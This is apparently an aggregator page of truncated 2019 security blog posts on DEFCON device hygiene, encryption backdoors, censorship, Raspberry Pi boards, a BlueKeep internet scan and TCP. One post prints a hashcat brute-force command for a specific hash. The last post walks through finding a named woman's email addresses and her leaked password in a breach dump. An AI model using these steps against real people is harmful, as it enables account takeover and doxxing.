What's new arround internet

Last one

Src Date (GMT) Titre Description Tags Stories Notes
ErrataRob.webp 2019-08-04 18:52:45 Securing devices for DEFCON (lien direct) There's been much debate whether you should get burner devices for hacking conventions like DEF CON (phones or laptops). A better discussion would be to list those things you should do to secure yourself before going, just in case.These are the things I worry about:backup before you goupdate before you gocorrectly locking your devices with full disk encryptioncorrectly configuring WiFiBluetooth devicesMobile phone vs. StingraysUSBBackupTraveling means a higher chance of losing your device. In my review of crime statistics, theft seems less of a threat than whatever city you are coming from. My guess is that while thieves may want to target tourists, the police want to even more the target gangs of thieves, to protect the cash cow that is the tourist industry. But you are still more likely to accidentally leave a phone in a taxi or have your laptop crushed in the overhead bin. If you haven't recently backed up your device, now would be an extra useful time to do this.Anything I want backed up on my laptop is already in Microsoft's OneDrive, so I don't pay attention to this. However, I have a lot of pictures on my iPhone that I don't have in iCloud, so I copy those off before I go.UpdateLike most of you, I put off updates unless they are really important, updating every few months rather than every month. Now is a great time to make sure you have the latest updates.Backup before you update, but then, I already mentioned that above.Full disk encryptionThis is enabled by default on phones, but not the default for laptops. It means that if you lose your device, adversaries can't read any data from it.You are at risk if you have a simple unlock code, like a predicable pattern or a 4-digit code. The longer and less predictable your unlock code, the more secure you are.I use iPhone's "face id" on my phone so that people looking over my shoulder can't figure out my passcode when I need to unlock the phone. However, because this enables the police to easily unlock my phone, by putting it in front of my face, I also remember how to quickly disable face id (by holding the buttons on both sides for 2 seconds).As for laptops, it's usually easy to enable full disk encryption. However there are some gotchas. Microsoft requires a TPM for its BitLocker full disk encryption, which your laptop might not support. I don't know why all laptops don't just have TPMs, but they don't. You may be able to use some tricks to get around this. There are also third party full disk encryption products that use simple passwords.If you don't have a TPM, then hackers can brute-force crack your password, trying billions per second. This applies to my MacBook Air, which is the 2017 model before Apple started adding their "T2" chip to all their laptops. Therefore, I need a strong login password.I deal with this on my MacBook by having two accounts. When I power on the device, I log into an account using a long/complicated password. I then switch to an account with a simpler account for going in/out of sleep mode. This second account can't be used to decrypt the drive.On Linux, my password to decrypt the drive is similarly long, while the user account password is pretty short.I ignore the "evil maid" threat, because my devices are always with me rather than in Hack Threat Guideline
ErrataRob.webp 2019-07-28 15:21:32 Why we fight for crypto (lien direct) This last week, the Attorney General William Barr called for crypto backdoors. His speech is a fair summary of law-enforcement's side of the argument. In this post, I'm going to address many of his arguments.The tl;dr version of this blog post is this:Their claims of mounting crime are unsubstantiated, based on emotional anecdotes rather than statistics. We live in a Golden Age of Surveillance where, if any balancing is to be done in the privacy vs. security tradeoff, it should be in favor of more privacy.But we aren't talking about tradeoff with privacy, but other rights. In particular, it's every much as important to protect the rights of political dissidents to keep some communications private (encryption) as it is to allow them to make other communications public (free speech). In addition, there is no solution to their "going dark" problem that doesn't restrict the freedom to run arbitrary software of the user's choice on their computers/phones.Thirdly, there is the problem of technical feasibility. We don't know how to make backdoors available for law enforcement access that doesn't enormously reduce security for users.BalanceThe crux of his argument is balancing civil rights vs. safety, also described as privacy vs. security. This balance is expressed in the constitution by the Fourth Amendment. The 4rth doesn't express an absolute right to privacy, but allows for police to invade your privacy if they can show an independent judge that they have "probable cause". By making communications "warrant proof", encryption is creating a "law free zone" enabling crime to be conducted without the ability of the police to investigate.It's a reasonable argument. If your child gets kidnapped by sex traffickers, you'll be demanding the police do something, anything to get your child back safe. If a phone is found at the scene, you'll definitely want them to have the ability to decrypt the phone, as long as a judge gives them a search warrant to balance civil liberty concerns.However, this argument is wrong, as I'll discuss below.Law free zonesBarr claims encryption creates a new "law free zone ... giving criminals the means to operate free of lawful scrutiny". He pretends that such zones never existed before.Of course they've existed before. Attorney-client privilege is one example, which is definitely abused to further crime. Barr's own boss has committed obstruction of justice, hiding behind the law-free zone of Article II of the constitution. We are surrounded by legal loopholes that criminals exploit in order to commit crimes, where the cost of closing the loophole is greater than the benefit.The biggest "law free zone" that exists is just the fact that we don't live in a universal surveillance state. I think impure thoughts without the police being able to read my mind. I can whisper quietly in your ear at a bar without the government overhearing. I can invite you over to my house to plot nefarious deeds in my living room.Technology didn't create these zones. However, technological advances are allowing police to defeat them.Business's have security cameras everywhere. Neighborhood associations are installing license plate readers. We are putting Echo/OkGoogle/Cortana/Siri devices in our homes listening to us. Our phones and computers have microphones and cameras. Our TV's increasingly have cameras and mics, too, in case we want to use them for video conferencing, or give them voice commands.Every argument Barr makes about crypto backdoors applies to backdoor access to microphones, every arguments applies to forcing TVs to have a backdoor allowing police armed with a warrant to turn on the camera in your living room. These Guideline
ErrataRob.webp 2019-06-14 19:45:51 Censorship vs. the memes (lien direct) The most annoying thing in any conversation is when people drop a meme bomb, some simple concept they've heard elsewhere in a nice package that they really haven't thought through, which takes time and nuance to rebut. These memes are often bankrupt of any meaning.When discussing censorship, which is wildly popular these days, people keep repeating these same memes to justify it:you can't yell fire in a crowded movie theaterbut this speech is harmfulKarl Popper's Paradox of Tolerancecensorship/free-speech don't apply to private organizationsTwitter blocks and free speechThis post takes some time to discuss these memes, so I can refer back to it later, instead of repeating the argument every time some new person repeats the same old meme.You can't yell fire in a crowded movie theaterThis phrase was first used in the Supreme Court decision Schenck v. United States to justify outlawing protests against the draft. Unless you also believe the government can jail you for protesting the draft, then the phrase is bankrupt of all meaning.In other words, how can it be used to justify the thing you are trying to censor and yet be an invalid justification for censoring those things (like draft protests) you don't want censored?What this phrase actually means is that because it's okay to suppress one type of speech, it justifies censoring any speech you want. Which means all censorship is valid. If that's what you believe, just come out and say "all censorship is valid".But this speech is harmful or invalidThat's what everyone says. In the history of censorship, nobody has ever wanted to censor good speech, only speech they claimed was objectively bad, invalid, unreasonable, malicious, or otherwise harmfulIt's just that everybody has different definitions of what, actually is bad, harmful, or invalid. It's like the movie theater quote. For example, China's constitution proclaims freedom of speech, yet the government blocks all mention of the Tienanmen Square massacre because it's harmful. It's "Great Firewall of China" is famous for blocking most of the content of the Internet that the government claims harms its citizens.I put some photos of the Tiananmen anniversary mass vigil in #Hongkong last night onto Wechat and my account has been suspended for “spreading malicious rumours”. The #China of today... pic.twitter.com/F6e2exsgGE- Stephen McDonell (@StephenMcDonell) June 5, 2019At least in case of movie theaters, the harm of shouting "fire" is immediate and direct. In all these other cases, the harm is many steps removed. Many want to censor anti-vaxxers, because their speech kills children. But the speech doesn't, the virus does. By extension, those not getting vaccinations may harm peopl
ErrataRob.webp 2019-05-31 20:15:34 Some Raspberry Pi compatible computers (lien direct) I noticed this spreadsheet over at r/raspberry_pi reddit. I thought I'd write up some additional notes.https://docs.google.com/spreadsheets/d/1jWMaK-26EEAKMhmp6SLhjScWW2WKH4eKD-93hjpmm_s/edit#gid=0Consider the Upboard, an x86 computer in the Raspberry Pi form factor for $99. When you include storage, power supplies, heatsinks, cases, and so on, it's actually pretty competitive. It's not ARM, so many things built for the Raspberry Pi won't necessarily work. But on the other hand, most of the software built for the Raspberry Pi was originally developed for x86 anyway, so sometimes it'll work better.Consider the quasi-RPi boards that support the same GPIO headers, but in a form factor that's not the same as a RPi. A good example would be the ODroid-N2. These aren't listed in the above spreadsheet, but there's a tone of them. There's only two Nano Pi's listed in the spreadsheet having the same form factor as the RPi, but there's around 20 different actual boards with all sorts of different form factors and capabilities.Consider the heatsink, which can make a big difference in the performance and stability of the board. You can put a small heatsink on any board, but you really need larger heatsinks and possibly fans. Some boards, like the ODroid-C2, come with a nice large heatsink. Other boards have a custom designed large heatsink you can purchase along with the board for around $10. The Raspberry Pi, of course, has numerous third party heatsinks available. Whether or not there's a nice large heatsink available is an important buying criteria. That spreadsheet should have a column for "Large Heatsink", whether one is "Integrated" or "Available".Consider power consumption and heat dissipation as a buying criteria. Uniquely among the competing devices, the Raspberry Pi itself uses a CPU fabbed on a 40nm process, whereas most of the competitors use 28nm or even 14nm. That means it consumes more power and produces more heat than any of it's competitors, by a large margin. The Intel Atom CPU mentioned above is actually one of the most power efficient, being fabbed on a 14nm process. Ideally, that spreadsheet would have tow additional columns for power consumption (and hence heat production) at "Idle" and "Load".You shouldn't really care about CPU speed. But if you are, there basically two classes of speed: in-order and out-of-order. For the same GHz, out-of-order CPUs are roughly twice as fast as in-order. The Cortex A5, A7, and A53 are in-order. The Cortex A17, A72, and A73 (and Intel Atom) are out-of-order. The spreadsheet also lists some NXP i.MX series processors, but those are actually ARM Cortex designs. I don't know which, though.The spreadsheet lists memory, like LPDDR3 or DDR4, but it's unclear as to speed. There's two things that determine speed, the number of MHz/GHz and the width, typically either 32-bits or 64-bits. By "64-bits" we can mean a single channel that's 64-bits wide, as in the case of the Intel Atom processors, or two channels that are each 32-bits wide, as in the case of some ARM processors. The Raspberry Pi has an incredibly anemic 32-bit 400-MHz memory, whereas some competitors have 64-bit 1600-MHz memory, or roughly 8 times the speed. For CPU-bound tasks, this isn't so important, but a lot of tasks are in fact bound by memory speed.As for GPUs, most are not OpenCL programmable, but some are. The VideoCore and Mali 4xx (Utgard) GPUs are not programmable. The Mali Txxx (Midgard) are programmable. The "MP2" suffix means two GPU processors, whereas "MP4" means four GPU processors. For a lot of tasks, such as "SDR" (software defined radio), offloading onto GPU simultaneously reduce
ErrataRob.webp 2019-05-29 20:16:09 Your threat model is wrong (lien direct) Several subjects have come up with the past week that all come down to the same thing: your threat model is wrong. Instead of addressing the the threat that exists, you've morphed the threat into something else that you'd rather deal with, or which is easier to understand.PhishingAn example is this question that misunderstands the threat of "phishing":Should failing multiple phishing tests be grounds for firing? I ran into a guy at a recent conference, said his employer fired people for repeatedly falling for (simulated) phishing attacks. I talked to experts, who weren't wild about this disincentive. https://t.co/eRYPZ9qkzB pic.twitter.com/Q1aqCmkrWL- briankrebs (@briankrebs) May 29, 2019The (wrong) threat model is here is that phishing is an email that smart users with training can identify and avoid. This isn't true.Good phishing messages are indistinguishable from legitimate messages. Said another way, a lot of legitimate messages are in fact phishing messages, such as when HR sends out a message saying "log into this website with your organization username/password".Recently, my university sent me an email for mandatory Title IX training, not digitally signed, with an external link to the training, that requested my university login creds for access, that was sent from an external address but from the Title IX coordinator.- Tyler Pieron (@tyler_pieron) May 29, 2019Yes, it's amazing how easily stupid employees are tricked by the most obvious of phishing messages, and you want to point and laugh at them. But frankly, you want the idiot employees doing this. The more obvious phishing attempts are the least harmful and a good test of the rest of your security -- which should be based on the assumption that users will frequently fall for phishing.In other words, if you paid attention to the threat model, you'd be mitigating the threat in other ways and not even bother training employees. You'd be firing HR idiots for phishing employees, not punishing employees for getting tricked. Your systems would be resilient against successful phishes, such as using two-factor authentication.IoT securityAfter the Mirai worm, government types pushed for laws to secure IoT devices, as billions of insecure devices like TVs, cars, security cameras, and toasters are added to the Internet. Everyone is afraid of the next Mirai-type worm. For example, they are pushing for devices to be auto-updated.But auto-updates are a bigger threat than worms.Since Mirai, roughly 10-billion new IoT devices have been added to the Internet, yet there hasn't been a Mirai-sized worm. Why is that? After 10-billion new IoT devices, it's still Windows and not IoT that is the main problem.The answer is that number, 10-billion. Internet worms work by guessing IPv4 addresses, of which there are only 4-billion. You can't have 10-billion new devices on the public IPv4 addresses because there simply aren't enough addresses. Instead, those 10-billion devices are almost entirely being put on private ne Ransomware Tool Vulnerability Threat Guideline FedEx NotPetya
ErrataRob.webp 2019-05-28 06:20:06 Almost One Million Vulnerable to BlueKeep Vuln (CVE-2019-0708) (lien direct) Microsoft announced a vulnerability in it's "Remote Desktop" product that can lead to robust, wormable exploits. I scanned the Internet to assess the danger. I find nearly 1-million devices on the public Internet that are vulnerable to the bug. That means when the worm hits, it'll likely compromise those million devices. This will likely lead to an event as damaging as WannaCry and notPetya from 2017 -- potentially worse, as hackers have since honed their skills exploiting these things for ransomware and other nastiness.To scan the Internet, I started with masscan, my Internet-scale port scanner, looking for port 3389, the one used by Remote Desktop. This takes a couple hours, and lists all the devices running Remote Desktop -- in theory.This returned 7,629,102 results (over 7-million). However, there is a lot of junk out there that'll respond on this port. Only about half are actually Remote Desktop.Masscan only finds the open ports, but is not complex enough to check for the vulnerability. Remote Desktop is a complicated protocol. A project was posted that could connect to an address and test it, to see if it was patched or vulnerable. I took that project and optimized it a bit, rdpscan, then used it to scan the results from masscan. It's a thousand times slower, but it's only scanning the results from masscan instead of the entire Internet.The table of results is as follows:1447579  UNKNOWN - receive timeout1414793  SAFE - Target appears patched1294719  UNKNOWN - connection reset by peer1235448  SAFE - CredSSP/NLA required 923671  VULNERABLE -- got appid 651545  UNKNOWN - FIN received 438480  UNKNOWN - connect timeout 105721  UNKNOWN - connect failed 9  82836  SAFE - not RDP but HTTP  24833  UNKNOWN - connection reset on connect   3098  UNKNOWN - network error   2576  UNKNOWN - connection terminatedThe various UNKNOWN things fail for various reasons. A lot of them are because the protocol isn't actually Remote Desktop and respond weirdly when we try to talk Remote Desktop. A lot of others are Windows machines, sometimes vulnerable and sometimes not, but for some reason return errors sometimes.The important results are those marked VULNERABLE. There are 923,671 vulnerable machines in this result. That means we've confirmed the vulnerability really does exist, though it's possible a small number of these are "honeypots" deliberately pretending to be vulnerable in order to monitor hacker activity on the Internet.The next result are those marked SAFE due to probably being "pached". Actually, it doesn't necessarily mean they are patched Windows boxes. They could instead be non-Windows systems that appear the same as patched Windows boxes. But either way, they are safe from this vulnerability. There are 1,414,793 of them.The next result to look at are those marked SAFE due to CredSSP/NLA failures, of which there are 1,235,448. This doesn't mean they are patched, but only that we can't exploit them. They require "network level authentication" first before we can talk Remote Desktop to them. That means we can't test whether they are patched or vulnerable -- but neither can the hackers. They may still be exploitable via an insider threat who knows a valid username/password, but they aren't exploitable by anonymous hackers or worms.The next category is marked as SAFE because they aren't Remote Desktop at all, but HTTP servers. In other words, in response to o Ransomware Vulnerability Threat Patching Guideline NotPetya Wannacry
ErrataRob.webp 2019-05-27 19:59:38 A lesson in journalism vs. cybersecurity (lien direct) A recent NYTimes article blaming the NSA for a ransomware attack on Baltimore is typical bad journalism. It's an op-ed masquerading as a news article. It cites many to support the conclusion the NSA is to be blamed, but only a single quote, from the NSA director, from the opposing side. Yet many experts oppose this conclusion, such as @dave_maynor, @beauwoods, @daveaitel, @riskybusiness, @shpantzer, @todb, @hrbrmst, ... It's not as if these people are hard to find, it's that the story's authors didn't look.The main reason experts disagree is that the NSA's Eternalblue isn't actually responsible for most ransomware infections. It's almost never used to start the initial infection -- that's almost always phishing or website vulns. Once inside, it's almost never used to spread laterally -- that's almost always done with windows networking and stolen credentials. Yes, ransomware increasingly includes Eternalblue as part of their arsenal of attacks, but this doesn't mean Eternalblue is responsible for ransomware.The NYTimes story takes extraordinary effort to jump around this fact, deliberately misleading the reader to conflate one with the other. A good example is this paragraph:That link is a warning from last July about the "Emotet" ransomware and makes no mention of EternalBlue. Instead, the story is citing anonymous researchers claiming that EthernalBlue has been added to Emotet since after that DHS warning.Who are these anonymous researchers? The NYTimes article doesn't say. This is bad journalism. The principles of journalism are that you are supposed to attribute where you got such information, so that the reader can verify for themselves whether the information is true or false, or at least, credible.And in this case, it's probably false. The likely source for that claim is this article from Malwarebytes about Emotet. They have since retracted this claim, as the latest version of their article points out.In any event, the NYTimes article claims that Emotet is now "relying" on the NSA's EternalBlue to spread. That's not the same thing as "using", not even close. Yes, lots of ransomware has been updated to also use Eternalblue to spread. However, what ransomware is relying upon is still the Wind Ransomware Malware Patching Guideline NotPetya Wannacry
ErrataRob.webp 2019-04-23 00:18:02 Programming languages infosec professionals should learn (lien direct) Code is an essential skill of the infosec professional, but there are so many languages to choose from. What language should you learn? As a heavy coder, I thought I'd answer that question, or at least give some perspective.The tl;dr is JavaScript. Whatever other language you learn, you'll also need to learn JavaScript. It's the language of browsers, Word macros, JSON, NodeJS server side, scripting on the command-line, and Electron apps. You'll also need to a bit of bash and/or PowerShell scripting skills, SQL for database queries, and regex for extracting data from text files. Other languages are important as well, Python is very popular for example. Actively avoid C++ and PHP as they are obsolete.Also tl;dr: whatever language you decide to learn, also learn how to use an IDE with visual debugging, rather than just a text editor. That probably means Visual Code from Microsoft. Also, whatever language you learn, stash your code at GitHub.Let's talk in general terms. Here are some types of languages.Unavoidable. As mentioned above, familiarity with JavaScript, bash/Powershell, and SQL are unavoidable. If you are avoiding them, you are doing something wrong.Small scripts. You need to learn at least one language for writing quick-and-dirty command-line scripts to automate tasks or process data. As a tool using animal, this is your basic tool. You are a monkey, this is the stick you use to knock down the banana. Good choices are JavaScript, Python, and Ruby. Some domain-specific languages can also work, like PHP and Lua. Those skilled in bash/PowerShell can do a surprising amount of "programming" tasks in those languages. Old timers use things like PERL or TCL. Sometimes the choice of which language to learn depends upon the vast libraries that come with the languages, especially Python and JavaScript libraries.Development languages.  Those scripting languages have grown up into real programming languages, but for the most part, "software development" means languages designed for that task like C, C++, Java, C#, Rust, Go, or Swift.Domain-specific languages. The language Lua is built into nmap, snort, Wireshark, and many games. Ruby is the language of Metasploit. Further afield, you may end up learning languages like R or Matlab. PHP is incredibly important for web development. Mobile apps may need Java, C#, Kotlin, Swift, or Objective-C.As an experienced developer, here are my comments on the various languages, sorted in alphabetic order.bash (and other Unix shells)You have to learn some bash for dealing with the command-line. But it's also a fairly completely programming language. Perusing the scripts in an average Linux distribution, especially some of the older ones, and you'll find that bash makes up a substantial amount of what we think of as the Linux operating system. Actually, it's called bash/Linux.In the Unix world, there are lots of other related shells that aren't bash, which have slightly different syntax. A good example is BusyBox which has "ash". I mention this because my bash skills are rather poor partly because I originally learned "csh" and get my syntax variants confused.As a hard-core developer, I end up just programming in JavaScript or even C rather than trying to create complex bash scripts. But you shouldn't look down on complex bash scripts, because they can do great things. In particular, if you are a pentester, the shell is often the only language you'll get when hacking into a system, sod good bash language skills are a must.CThis is the development language I use the most, simply because I'm an old-time "systems" developer. What "systems programming" means i Guideline
ErrataRob.webp 2019-04-21 17:16:36 Was it a Chinese spy or confused tourist? (lien direct) Politico has an article from a former spy analyzing whether the "spy" they caught at Mar-a-lago (Trump's Florida vacation spot) was actually a "spy". I thought I'd add to it from a technical perspective about her malware, USB drives, phones, cash, and so on.The part that has gotten the most press is that she had a USB drive with evil malware. We've belittled the Secret Service agents who infected themselves, and we've used this as the most important reason to suspect she was a spy.But it's nonsense.It could be something significant, but we can't know that based on the details that have been reported. What the Secret Service reported was that it "started installing software". That's a symptom of a USB device installing drivers, not malware. Common USB devices, such as WiFi adapters, Bluetooth adapters, microSD readers, and 2FA keys look identical to flash drives, and when inserted into a computer, cause Windows to install drivers.Visual "installing files" is not a symptom of malware. When malware does its job right, there are no symptoms. It installs invisibly in the background. Thats the entire point of malware, that you don't know it's there. It's not to say there would be no visible evidence. A popular way of hacking desktops with USB drives is by emulating a keyboard/mouse that quickly types commands, which will cause some visual artifacts on the screen. It's just that "installing files" does not lend itself to malware as being the most likely explanation.That it was "malware" instead of something normal is just the standard trope that anything unexplained is proof of hackers/viruses. We have no evidence it was actually malware, and the evidence we do have suggests something other than malware.Lots of travelers carry wads of cash. I carry ten $100 bills with me, hidden in my luggage, for emergencies. I've been caught before when the credit card company fraud detection triggers in a foreign country leaving me with nothing. It's very distressing, hence cash.The Politico story mentioned the "spy" also has a U.S. bank account, and thus cash wasn't needed. Well, I carry that cash, too, for domestic travel. It's just not for international travel. In any case, the U.S. may have been just one stop on a multi-country itinerary. I've taken several "round the world" trips where I've just flown one direction, such as east, before getting back home. $8k is in the range of cash that such travelers carry.The same is true of phones and SIMs. Different countries have different frequencies and technologies. In the past, I've traveled with as many as three phones (US, Japan, Europe). It's gotten better with modern 4G phones, where my iPhone Xs should work everywhere. (Though it's likely going to diverge again with 5G, as the U.S. goes on a different path from the rest of the world.)The same is true with SIMs. In the past, you pretty much needed a different SIM for each country. Arrival in the airport meant going to the kiosk to get a SIM for $10. At the end of a long itinerary, I'd arrive home with several SIMs. These days, however, with so many "MVNOs", such as Google Fi, this is radically less necessary. However, the fact that the latest high-end phones all support dual-SIMs proves it's still an issue.Thus, the evidence so far is that of a normal traveler. If these SIMs/phones are indeed because of spying, we would need additional evidence. A quick analysis of the accounts associated with the SIMs and the of the contents of the phones should tells us if she's a traveler or spy.Normal travelers may be concerned about hidden cameras. There's this story from about Korean hotels filming guests, and this other one about Malware
ErrataRob.webp 2019-04-11 20:22:14 Assange indicted for breaking a password (lien direct) In today's news, after 9 years holed up in the Ecuadorian embassy, Julian Assange has finally been arrested. The US DoJ accuses Assange for trying to break a password. I thought I'd write up a technical explainer what this means.According to the US DoJ's press release:Julian P. Assange, 47, the founder of WikiLeaks, was arrested today in the United Kingdom pursuant to the U.S./UK Extradition Treaty, in connection with a federal charge of conspiracy to commit computer intrusion for agreeing to break a password to a classified U.S. government computer.The full indictment is here.It seems the indictment is based on already public information that came out during Manning's trial, namely this log of chats between Assange and Manning, specifically this section where Assange appears to agree to break a password:What this says is that Manning hacked a DoD computer and found the hash "80c11049faebf441d524fb3c4cd5351c" and asked Assange to crack it. Assange appears to agree.So what is a "hash", what can Assange do with it, and how did Manning grab it?Computers store passwords in an encrypted (sic) form called a "one way hash". Since it's "one way", it can never be decrypted. However, each time you log into a computer, it again performs the one way hash on what you typed in, and compares it with the stored version to see if they match. Thus, a computer can verify you've entered the right password, without knowing the password itself, or storing it in a form hackers can easily grab. Hackers can only steal the encrypted form, the hash.When they get the hash, while it can't be decrypted, hackers can keep guessing passwords, performing the one way algorithm on them, and see if they match. With an average desktop computer, they can test a billion guesses per second. This may seem like a lot, but if you've chosen a sufficiently long and complex password (more than 12 characters with letters, numbers, and punctuation), then hackers can't guess them.It's unclear what format this password is in, whether "NT" or "NTLM". Using my notebook computer, I could attempt to crack the NT format using the hashcat password crack with the following command:hashcat -m 3000 -a 3 80c11049faebf441d524fb3c4cd5351c ?a?a?a?a?a?a?aAs this image shows, it'll take about 22 hours on my laptop to crack this. However, this doesn't succeed, so it seems that this isn't in the NT format. Unlike other password formats, the "NT" format can only be 7 characters in length, so we can completely crack it. Hack
ErrataRob.webp 2019-03-12 18:43:41 Some notes on the Raspberry Pi (lien direct) I keep seeing this article in my timeline today about the Raspberry Pi. I thought I'd write up some notes about it.The Raspberry Pi costs $35 for the board, but to achieve a fully functional system, you'll need to add a power supply, storage, and heatsink, which ends up costing around $70 for the full system. At that price range, there are lots of alternatives. For example, you can get a fully function $99 Windows x86 PC, that's just as small and consumes less electrical power.There are a ton of Raspberry Pi competitors, often cheaper with better hardware, such as a Odroid-C2, Rock64, Nano Pi, Orange Pi, and so on. There are also a bunch of "Android TV boxes" running roughly the same hardware for cheaper prices, that you can wipe and reinstall Linux on. You can also acquire Android phones for $40.However, while "better" technically, the alternatives all suffer from the fact that the Raspberry Pi is better supported -- vastly better supported. The ecosystem of ARM products focuses on getting Android to work, and does poorly at getting generic Linux working. The Raspberry Pi has the worst, most out-of-date hardware, of any of its competitors, but I'm not sure I can wholly recommend any competitor, as they simply don't have the level of support the Raspberry Pi does.The defining feature of the Raspberry Pi isn't that it's a small/cheap computer, but that it's a computer with a bunch of GPIO pins. When you look at the board, it doesn't just have the recognizable HDMI, Ethernet, and USB connectors, but also has 40 raw pins strung out across the top of the board. There's also a couple extra connectors for cameras.The concept wasn't simply that of a generic computer, but a maker device, for robot servos, temperature and weather measurements, cameras for a telescope, controlling christmas light displays, and so on.I think this is underemphasized in the above story. The reason it finds use in the factories is because they have the same sorts of needs for controlling things that maker kids do. A lot of industrial needs can be satisfied by a teenager buying $50 of hardware off Adafruit and writing a few Python scripts.On the other hand, support for industrial uses is nearly nonexistant. The reason commercial products cost $1000 is because somebody will answer your phone, unlike the teenager whose currently out at the movies with their friends. However, with more and more people having experience with the Raspberry Pi, presumably you'll be able to hire generic consultants soon that can maintain th Hack
ErrataRob.webp 2019-03-09 15:39:51 A quick lesson in confirmation bias (lien direct) In my experience, hacking investigations are driven by ignorance and confirmation bias. We regularly see things we cannot explain. We respond by coming up with a story where our pet theory explains it. Since there is no alternative explanation, this then becomes evidence of our theory, where this otherwise inexplicable thing becomes proof.For example, take that "Trump-AlfaBank" theory. One of the oddities noted by researchers is lookups for "trump-email.com.moscow.alfaintra.net". One of the conspiracy theorists explains has proof of human error, somebody "fat fingered" the wrong name when typing it in, thus proving humans were involved in trying to communicate between the two entities, as opposed to simple automated systems.But that's because this "expert" doesn't know how DNS works. Your computer is configured to automatically put local suffices on the end of names, so that you only have to lookup "2ndfloorprinter" instead of a full name like "2ndfloorprinter.engineering.example.com".When looking up a DNS name, your computer may try to lookup the name both with and without the suffix. Thus, sometimes your computer looks up "www.google.com.engineering.exmaple.com" when it wants simply "www.google.com".Apparently, Alfabank configures its Moscow computers to have a suffix "moscow.alfaintra.net". That means any DNS name that gets resolved will sometimes get this appended, so we'll sometimes see "www.google.com.moscow.alfaintra.net".Since we already know there were lookups from that organization for "trump-email.com", the fact that we also see "trump-email.com.moscow.alfaintra.net" tells us nothing new.In other words, the conspiracy theorists didn't understand it, so came up with their own explanation, and this confirmed their biases. In fact, there is a simpler explanation that neither confirms nor refutes anything.The reason for the DNS lookups for "trump-email.com" are still unexplained. Maybe they are because of something nefarious. The Trump organizations had all sorts of questionable relationships with Russian banks, so such a relationship wouldn't be surprising. But here's the thing: just because we can't come up with a simpler explanation doesn't make them proof of a Trump-Alfabank conspiracy. Until we know why those lookups where generated, they are an "unknown" and not "evidence".The reason I write this post is because of this story about a student expelled due to "grade hacking". It sounds like this sort of situation, where the IT department saw anomalies it couldn't explain, so the anomalies became proof of the theory they'd created to explain them.Unexplained phenomena are unexplained. They are not evidence confirming your theory that explains them.
ErrataRob.webp 2019-02-25 18:20:47 A basic question about TCP (lien direct) So on Twitter, somebody asked this question:I have a very basic computer networking question: when sending a TCP packet, is the packet ACK'ed at every node in the route between the sender and the recipient, or just by the final recipient?This isn't just a basic question, it is the basic question, the defining aspect of TCP/IP that makes the Internet different from the telephone network that predated it.Remember that the telephone network was already a cyberspace before the Internet came around. It allowed anybody to create a connection to anybody else. Most circuits/connections were 56-kilobits-per-secondl using the "T" system, these could be aggregated into faster circuits/connections. The "T1" line consisting of 1.544-mbps was an important standard back in the day.In the phone system, when a connection is established, resources must be allocated in every switch along the path between the source and destination. When the phone system is overloaded, such as when you call loved ones when there's been an earthquake/tornado in their area, you'll sometimes get a message "No circuits are available". Due to congestion, it can't reserve the necessary resources in one of the switches along the route, so the call can't be established."Congestion" is important. Keep that in mind. We'll get to it a bit further down.The idea that each router needs to ACK a TCP packet means that the router needs to know about the TCP connection, that it needs to reserve resources to it.This was actually the original design of the the OSI Network Layer.Let's rewind a bit and discuss "OSI". Back in the 1970s, the major computer companies of the time all had their own proprietary network stacks. IBM computers couldn't talk to DEC computers, and neither could talk to Xerox computers. They all worked differently. The need for a standard protocol stack was obvious.To do this, the "Open Systems Interconnect" or "OSI" group was established under the auspices of the ISO, the international standards organization.The first thing the OSI did was create a model for how protocol stacks would work. That's because different parts of the stack need to be independent from each other.For example, consider the local/physical link between two nodes, such as between your computer and the local router, or your router to the next router. You use Ethernet or WiFi to talk to your router. You may use 802.11n WiFi in the 2.4GHz band, or 802.11ac in the 5GHz band. However you do this, it doesn't matter as far as the TCP/IP packets are concerned. This is just between you and your router, and all the information is stripped out of the packets before they are forwarded to across the Internet.Likewise, your ISP may use cable modems (DOCSIS) to connect your router to their routers, or they may use xDSL. This information is likewise is stripped off before packets go further into the Internet. When your packets reach the other end, like at Google's servers, they contain no traces of this.There are 7 layers to the OSI model. The one we are most interested in is layer 3, the "Network Layer". This is the layer at which IPv4 and IPv6 operate. TCP will be layer 4, the "Transport Layer".The original idea for the network layer was that it would be connection oriented, modeled after the phone system. The phone system was already offering such a service, called X.25, which the OSI model was built around. X.25 was important in the pre-Internet era for creating long-distance computer connections, allowing cheaper connections than renting a full T1 circuit from the phone company. Normal telephone circuits are designed for a continuous flow of data, whereas computer communication is bursty. X.25 was especially popular for terminals, because it only needed to send packets from the terminal when users were typing.Layer 3 also included
ErrataRob.webp 2019-02-08 10:08:18 How Bezo\'s dick pics might\'ve been exposed (lien direct) In the news, the National Enquirer has extorted Amazon CEO Jeff Bezos by threatening to publish the sext-messages/dick-pics he sent to his mistress. How did the National Enquirer get them? There are rumors that maybe Trump's government agents or the "deep state" were involved in this sordid mess. The more likely explanation is that it was a simple hack. Teenage hackers regularly do such hacks -- they aren't hard.This post is a description of how such hacks might've been done.To start with, from which end were they stolen? As a billionaire, I'm guessing Bezos himself has pretty good security, so I'm going to assume it was the recipient, his girlfriend, who was hacked.The hack starts by finding the email address she uses. People use the same email address for both public and private purposes. There are lots of "people finder" services on the Internet that you can use to track this information down. These services are partly scams, using "dark patterns" to get you to spend tons of money on them without realizing it, so be careful.Using one of these sites, I quickly found a couple of a email accounts she's used, one at HotMail, another at GMail. I've blocked out her address. I want to describe how easy the process is, I'm not trying to doxx her.Next, I enter those email addresses into the website http://haveibeenpwned.com to see if hackers have ever stolen her account password. When hackers break into websites, they steal the account passwords, and then exchange them on the dark web with other hackers. The above website tracks this, helping you discover if one of your accounts has been so compromised. You should take this opportunity to enter your email address in this site to see if it's been so "pwned".I find that her email addresses have been included in that recent dump of 770 million accounts called "Collection#1".The http://haveibeenpwned.com won't disclose the passwords, only the fact they've been pwned. However, I have a copy of that huge Collection#1 dump, so I can search it myself to get her password. As this output shows, I get a few hits, all with the same password.At this point, I have a password, but not necessarily the password to access any useful accounts. For all I know, this was the Hack
